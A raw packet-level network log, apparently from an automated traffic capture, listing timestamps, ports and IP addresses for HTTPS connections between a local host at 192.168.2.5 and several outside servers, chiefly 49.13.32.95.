Nov 25, 2024 11:34:25.491633892 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.491676092 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.506123066 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.506145000 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.506206989 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.506212950 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.506237984 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.506251097 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.522907972 CET	443	49912	23.44.201.4	192.168.2.5
Nov 25, 2024 11:34:25.523022890 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.523037910 CET	443	49912	23.44.201.4	192.168.2.5
Nov 25, 2024 11:34:25.523044109 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.523128986 CET	49912	443	192.168.2.5	23.44.201.4
Nov 25, 2024 11:34:25.523782015 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.523788929 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.523828983 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.578747988 CET	50013	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.578773022 CET	443	50013	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.578785896 CET	50013	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.578795910 CET	443	50013	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.607561111 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.607590914 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.607644081 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.607652903 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.607685089 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.607712984 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.618474960 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.618495941 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.618547916 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.618556976 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.618592024 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.618609905 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.621877909 CET	50022	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.621921062 CET	443	50022	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.622167110 CET	50022	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.630245924 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.630265951 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.630312920 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.630319118 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.630346060 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.630364895 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.641201019 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.641221046 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.641271114 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.641275883 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.641313076 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.641320944 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.650994062 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.651012897 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.651065111 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.651070118 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.651114941 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.661448956 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.661468983 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.661518097 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.661523104 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.661561966 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.661580086 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.670363903 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.670392036 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.670444012 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.670449972 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.670475006 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.670497894 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.680640936 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.680661917 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.680695057 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.680701017 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.680732965 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.680752039 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.723965883 CET	50022	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:25.723984003 CET	443	50022	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:25.795957088 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.795980930 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.796092987 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.796103954 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.796689034 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.802542925 CET	443	50014	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:25.802577019 CET	443	50014	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:25.802611113 CET	443	50014	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:25.802639008 CET	50014	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:25.802647114 CET	443	50014	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:25.802675009 CET	50014	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:25.803236961 CET	50014	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:25.803242922 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.803252935 CET	443	50014	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:25.803260088 CET	50014	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:25.803266048 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.803318024 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.803322077 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.803356886 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.803363085 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.803446054 CET	443	50014	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:25.803478003 CET	443	50014	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:25.803524017 CET	50014	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:25.810200930 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.810224056 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.810280085 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.810286999 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.810312986 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.810333967 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.816365004 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.816394091 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.816447020 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.816456079 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.816481113 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.816507101 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.823368073 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.823388100 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.823421955 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.823429108 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.823479891 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.827384949 CET	50023	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:25.827426910 CET	443	50023	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:25.827502966 CET	50023	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:25.827661037 CET	50023	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:25.827671051 CET	443	50023	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:25.829919100 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.829940081 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.830008030 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.830014944 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.830034971 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.830051899 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.837003946 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.837024927 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.837081909 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.837089062 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.837100029 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.837122917 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.843894005 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.843914032 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.843966007 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.843971968 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.843996048 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.844021082 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.988342047 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.988369942 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.988425970 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.988439083 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.988457918 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.988478899 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.995408058 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.995429993 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.995522976 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:25.995529890 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:25.995620012 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.001470089 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.001490116 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.001548052 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.001554966 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.001610994 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.008411884 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.008436918 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.008495092 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.008500099 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.008523941 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.008543968 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.015451908 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.015472889 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.015518904 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.015523911 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.015548944 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.015561104 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.022032022 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.022052050 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.022099018 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.022104979 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.022166014 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.029053926 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.029074907 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.029110909 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.029122114 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.029145956 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.029160976 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.035207987 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.035228968 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.035320997 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.035326958 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.035398006 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.180356026 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.180386066 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.180433989 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.180444956 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.180490971 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.187361002 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.187381983 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.187423944 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.187429905 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.187453985 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.187479019 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.193500042 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.193520069 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.193562984 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.193569899 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.193599939 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.193612099 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.200542927 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.200563908 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.200653076 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.200659990 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.200700998 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.200709105 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.207422018 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.207442999 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.207489014 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.207494974 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.207529068 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.207544088 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.213974953 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.213996887 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.214046955 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.214056015 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.214072943 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.214092970 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.221120119 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.221142054 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.221179962 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.221185923 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.221230030 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.221246958 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.227201939 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.227232933 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.227273941 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.227283001 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.227319002 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.227327108 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.381625891 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.381655931 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.381701946 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.381742001 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.381757975 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.381777048 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.381874084 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.381895065 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.381922007 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.381928921 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.381953001 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.381973028 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.385658979 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.385679007 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.385719061 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.385725021 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.385761976 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.385780096 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.392478943 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.392499924 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.392565012 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.392573118 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.392611027 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.399437904 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.399458885 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.399502993 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.399509907 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.399545908 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.399555922 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.406158924 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.406179905 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.406229973 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.406236887 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.406255960 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.406276941 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.412950993 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.412971973 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.413008928 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.413014889 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.413043976 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.413064957 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.419135094 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.419154882 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.419189930 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.419197083 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.419239998 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.419249058 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.462425947 CET	443	50018	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:26.462837934 CET	50018	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:26.462856054 CET	443	50018	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:26.463180065 CET	443	50018	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:26.463522911 CET	50018	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:26.463588953 CET	443	50018	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:26.463723898 CET	50018	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:26.507333994 CET	443	50018	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:26.565196037 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.565220118 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.565269947 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.565287113 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.565318108 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.565342903 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.571254969 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.571274996 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.571319103 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.571325064 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.571351051 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.571374893 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.578197956 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.578217983 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.578260899 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.578268051 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.578290939 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.578314066 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.585177898 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.585206032 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.585239887 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.585244894 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.585275888 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.585309029 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.591725111 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.591746092 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.591784954 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.591790915 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.591820002 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.591851950 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.598793030 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.598819017 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.598860979 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.598875046 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.598897934 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.598915100 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.604873896 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.604895115 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.604933023 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.604943991 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.604983091 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.604995966 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.611860991 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.611881018 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.611921072 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.611933947 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.611963034 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.611982107 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.651578903 CET	443	50016	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:26.652113914 CET	50016	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:26.652137995 CET	443	50016	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:26.652839899 CET	50016	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:26.652847052 CET	443	50016	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:26.652885914 CET	50016	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:26.652896881 CET	443	50016	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:26.756560087 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.756589890 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:26.756628036 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:26.756655931 CET	443	50008	49.13.32.95	192.168.2.5
